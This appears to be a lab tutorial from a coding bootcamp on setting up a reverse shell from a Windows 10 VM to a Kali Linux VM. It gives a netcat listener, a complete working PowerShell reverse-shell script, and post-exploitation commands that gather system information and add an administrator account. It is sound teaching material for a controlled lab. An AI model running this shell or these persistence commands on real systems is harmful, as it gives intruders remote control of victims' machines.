By @rosinni and other contributors at 4Geeks Academy
These instructions are also available in Spanish
We need you! These exercises are created and maintained in collaboration with people like you. If you find any errors or typos, please contribute and/or report them.
This exercise aims to utilize Windows CMD commands in the context of a remote connection, simulating a remote hacking attack. This tutorial will help you establish a reverse shell from a Windows 10 machine to a Kali Linux machine, executing a series of commands to gather critical information from the Windows system. All of this will be done in a controlled environment, using virtual machines, and will focus on the post-exploitation phase of an ethical attack.
-
Attacker Machine (Kali Linux):
- Required Software:
Netcat(pre-installed on Kali Linux)
- Required Software:
-
Target Machine (Windows 10):
- Access to PowerShell and permission to run scripts
Both virtual machines must be configured with the bridged adapter option so they can communicate over the local network.
-
Network Configuration: Verify that both machines can communicate using the ping command from Kali to Windows and vice versa.
-
Establish the connection with Netcat on the Kali Linux machine (Attacker). Open a terminal and listen on a specific port (in this case, port 4444) using Netcat:
nc -lvnp 4444This will set up a listener on the Kali machine, waiting for a connection from Windows.
- Open PowerShell on the Windows 10 machine (Target) and execute the following script to establish the reverse shell:
$client = New-Object System.Net.Sockets.TCPClient("IP-de-Kali", 4444);
$stream = $client.GetStream();
$reader = New-Object System.IO.StreamReader($stream);
$writer = New-Object System.IO.StreamWriter($stream);
$writer.AutoFlush = $true;
while ($true) {
$data = $reader.ReadLine();
if ($data -eq "exit") { break }
try {
$result = Invoke-Expression $data 2>&1 | Out-String;
$writer.WriteLine($result);
} catch {
$writer.WriteLine("Error: $_");
}
$writer.Flush();
}Note: Remember to replace "IP-of-Kali" with the IP address of your Kali Linux machine.
With the script running on Windows, you can now send commands from Kali through the Netcat session you initiated. Here are some useful commands to interact with the Windows machine:
- List files in the current directory:
dir- Get system information:
systeminfo
- Get network configuration::
ipconfig
- List running processes:
tasklist
-
View system information:
hostname
-
List users on the system:
net user
-
View active network connections::
netstat -an
- Change directory::
tasklist
- Create a file or directory::
mkdir C:\TestFolder
- Shut down or restart the system::
shutdown /s /t 0 # Apagar shutdown /r /t 0 # Reiniciar
- Add an administrator user::
net user nuevo_usuario contraseña /add net localgroup Administradores nuevo_usuario /add
Research more commands to practice..
- Esto hará que el bucle en PowerShell termine y cierre la conexión.
exit
Thanks to these amazing people (emoji key):
-
Rosinni Rodriguez (rosinni) contribution: (build-tutorial) ✅, (documentation) 📖
-
Alejandro Sanchez (alesanchezr), contribution: (bug reports) 🐛
This project follows the all-contributors specification. Contributions of any kind are welcome!
This and other exercises are used to learn to code by students at 4Geeks Academy Coding Bootcamp led by Alejandro Sánchez and many other contributors. Learn more about our Programming Courses to become a Full Stack Developer, or our Data Science Bootcamp. You can also dive into cybersecurity with our Cybersecurity Bootcamp.